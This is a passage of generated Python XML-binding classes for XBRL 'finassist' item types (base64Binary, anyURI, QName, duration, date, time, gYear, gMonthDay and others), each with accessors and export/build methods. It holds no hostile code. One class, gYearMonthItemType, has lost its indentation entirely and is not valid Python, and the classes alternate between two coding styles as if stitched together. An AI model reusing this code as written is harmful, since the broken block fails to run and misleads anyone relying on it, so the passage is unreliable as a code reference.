        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='base64BinaryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='base64BinaryItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='base64BinaryItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='base64BinaryItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='base64BinaryItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class base64BinaryItemType
class anyURIItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``anyURIItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = anyURIItemType.subclass or anyURIItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='anyURIItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='anyURIItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='anyURIItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='anyURIItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='anyURIItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class anyURIItemType
class QNameItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``QNameItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = QNameItemType.subclass or QNameItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='QNameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='QNameItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='QNameItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='QNameItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='QNameItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class QNameItemType
class durationItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``durationItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = durationItemType.subclass or durationItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='durationItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='durationItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='durationItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='durationItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='durationItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class durationItemType
class dateTimeItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``dateTimeItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = dateTimeItemType.subclass or dateTimeItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='dateTimeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='dateTimeItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='dateTimeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='dateTimeItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='dateTimeItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class dateTimeItemType
class timeItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``timeItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = timeItemType.subclass or timeItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='timeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='timeItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='timeItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='timeItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='timeItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class timeItemType
class dateItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``dateItemType`` simple item.

    Holds a text value (``valueOf_``) plus optional ``id`` and
    ``contextRef`` XML attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_
    @staticmethod
    def factory(*args_, **kwargs_):
        # Route construction through a registered subclass when one exists.
        target = dateItemType.subclass or dateItemType
        return target(*args_, **kwargs_)
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_contextRef(self):
        return self.contextRef
    def set_contextRef(self, contextRef):
        self.contextRef = contextRef
    def get_valueOf_(self):
        return self.valueOf_
    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_
    def hasContent_(self):
        # Truthy text content marks the element as non-empty.
        return bool(self.valueOf_)
    def export(self, outfile, level, namespace_='finassist:', name_='dateItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to *outfile* as XML at indent *level*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Keep the tag name this element was originally parsed under.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='dateItemType')
        if not self.hasContent_():
            # No text content: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='dateItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='dateItemType'):
        # Emit each attribute at most once; already_processed tracks names seen.
        for attr_name, attr_value in (('id', self.id), ('contextRef', self.contextRef)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value)))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='dateItemType', fromsubclass_=False, pretty_print=True):
        # This simple type defines no child elements.
        pass
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Read each known attribute from the node exactly once.
        for attr_name in ('id', 'contextRef'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No children to parse for this simple type.
        pass
# end class dateItemType
class gYearMonthItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if gYearMonthItemType.subclass:
return gYearMonthItemType.subclass(*args_, **kwargs_)
else:
return gYearMonthItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='gYearMonthItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='gYearMonthItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gYearMonthItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gYearMonthItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='gYearMonthItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for child elements.
        pass
# end class gYearMonthItemType
class gYearItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``gYearItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = gYearItemType.subclass or gYearItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='gYearItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='gYearItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gYearItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gYearItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='gYearItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class gYearItemType
class gMonthDayItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``gMonthDayItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = gMonthDayItemType.subclass or gMonthDayItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
        # Non-empty text content makes the element non-empty.
        return bool(self.valueOf_)

    def export(self, outfile, level, namespace_='finassist:', name_='gMonthDayItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element (attributes + text content) to ``outfile``."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, (' ' + namespacedef_) if namespacedef_ else ''))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='gMonthDayItemType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>')
        outfile.write(str(self.valueOf_).encode(ExternalEncoding))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='gMonthDayItemType', pretty_print=pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='gMonthDayItemType'):
        """Write each attribute at most once."""
        for attr_, value_ in (('id', self.id), ('contextRef', self.contextRef)):
            if value_ is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                outfile.write(' %s=%s' % (attr_, quote_attrib(value_)))

    def exportChildren(self, outfile, level, namespace_='finassist:', name_='gMonthDayItemType', fromsubclass_=False, pretty_print=True):
        # Simple-content type: no child elements.
        pass

    def build(self, node):
        """Populate this instance from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child_ in node:
            childName_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, childName_)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        """Pick up ``id`` and ``contextRef`` attributes, if present."""
        for attr_ in ('id', 'contextRef'):
            value = find_attr_value_(attr_, node)
            if value is not None and attr_ not in already_processed:
                already_processed.add(attr_)
                setattr(self, attr_, value)

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple-content type: nothing to do for children.
        pass
# end class gMonthDayItemType
class gDayItemType(GeneratedsSuper):
    """Generated binding for the XBRL ``gDayItemType`` simple-content
    element: a text value plus optional ``id``/``contextRef`` attributes."""
    subclass = None
    superclass = None

    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.contextRef = _cast(None, contextRef)
        self.valueOf_ = valueOf_

    @staticmethod
    def factory(*args_, **kwargs_):
        # Honor a registered subclass when the application installed one.
        cls = gDayItemType.subclass or gDayItemType
        return cls(*args_, **kwargs_)

    def get_id(self):
        return self.id

    def set_id(self, id):
        self.id = id

    def get_contextRef(self):
        return self.contextRef

    def set_contextRef(self, contextRef):
        self.contextRef = contextRef

    def get_valueOf_(self):
        return self.valueOf_

    def set_valueOf_(self, valueOf_):
        self.valueOf_ = valueOf_

    def hasContent_(self):
